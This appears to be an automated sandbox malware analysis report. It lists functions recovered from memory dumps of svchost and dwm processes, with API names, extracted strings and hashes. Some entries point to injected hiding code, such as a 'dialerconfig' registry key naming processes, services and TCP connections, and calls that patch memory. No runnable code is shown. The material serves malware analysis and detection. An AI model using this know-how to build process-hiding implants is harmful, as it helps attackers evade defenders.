                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: c54ef34d66bd00901bd8adbac774be78d0448155a515a9e92ef6434a46babdc8
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 5561EB3661AF48C6E761DB9AE46475AB7E2F388784F500115EA8E97FA8DB7CC440CF40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 4f18cf734432864d1cadb05385a9f61388192ac32121d651ae8f93e19ceaa8fb
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 38115132A10F9131FB6615E8D4763E611DB6B683F8F180724A97636FD68A24C8414721
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 33dfdcfffdc3893784a7b309723e3667eaa1db39b5b3fd1c14ced88943099ce3
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 0111E332A10F3141FBA691ECE4753E91AC36F5C37CF49A638A96626ED6CA2CF8405700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: e363e31868ba0ebea0856da9f2af10226048556fbf55e11a4800ee541c068533
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3261D53A600E40C2FB6BCBE4E9703EE2AE3E785780F554415CA5A37FA4DB34D8499B40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction ID: 14cf2eee4fbcc911eae32f8475549afe507b7b7c46814838016a04d8a23f088c
                                                                          • Opcode Fuzzy Hash: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction Fuzzy Hash: DD614932602A888AEB21DFA9D4503DD7BE2F354B8CF045215EF4967B98DB39D595C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 2a90534c08ec7fa08356974faa6f23fad74bcd69915b4cf882117b33a0582183
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: A451E076101B88CAEB768FA994A43D87BE2F355B85F184116DA89E7FD5CB39C490CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                          • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                          • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                          • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                          • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 9b98193f4abecebd3cedc8816dec431a1792c86c15235ed78f17ee962988c809
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 94712476710B1186EB54AF66E8816DD23A4FB88B88F455161FF4E43B6CEF3AC484C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 033178934247518acb5e229b4bd71b0cdb11f550452f7048632aef5a9a5fdda0
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 30113039705B4182EF589B11E4082E96670F788B85F484065EF9907768EF3EC585C704

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction ID: 434fcb51119e4ac6e2baff75b907716165c9b00fc297fbffb68bc511ace73766
                                                                          • Opcode Fuzzy Hash: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction Fuzzy Hash: D1D18936619B8882DA759B06E4953DA77A0F3CCB84F100256EF8D47BA9DF3EC591CB40

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction ID: b5b57bb7076149ec6ec15b0b9582e6043a88fc9cac1626ef523c62cec37fb6bc
                                                                          • Opcode Fuzzy Hash: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction Fuzzy Hash: FD02D732619B8486EBA5CB55F49139AB7A1F3C8784F100155FB8E87BA9DF7EC494CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 955432155c5f211c1e188f8270860852f4b459ac956c4d442d1652e3f9e2d060
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: E331E13121AB8885EE789B15E0563DEA6A0F38C784F100565BBCD46BADDF7FC5C08B04

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: bf4817d5ecb573b1d4f3c3f5aa86b87a322d7626be9ec505051981a4af069143
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: 0F11AD7061130182FF6C9B21F84A3DA22A4E78C305F4082A5BF16815BDEF7BC0C48600

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction ID: 426f4314be6fc704dbd3c5c2a2ece3cab1f133022c7238dccab5964de4d016be
                                                                          • Opcode Fuzzy Hash: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction Fuzzy Hash: 14F0B736228B0480D635DB05E4927DAABA0E3CCBD4F144155BF8D47B6ECA3EC6D18B50

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 824515c9e048ad3417e9658daf70cb1266b7946d3fb066eb8b17d7491906e60f
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 26610373B01B9087DB58CF5994007EDB3A2F798BA4F588625EF5A0778CDA39D892C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001160CA91628: GetProcessHeap.KERNEL32 ref: 000001160CA91633
                                                                            • Part of subcall function 000001160CA91628: HeapAlloc.KERNEL32 ref: 000001160CA91642
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA916B2
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA916DF
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA916F9
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91719
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA91734
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91754
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA9176F
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA9178F
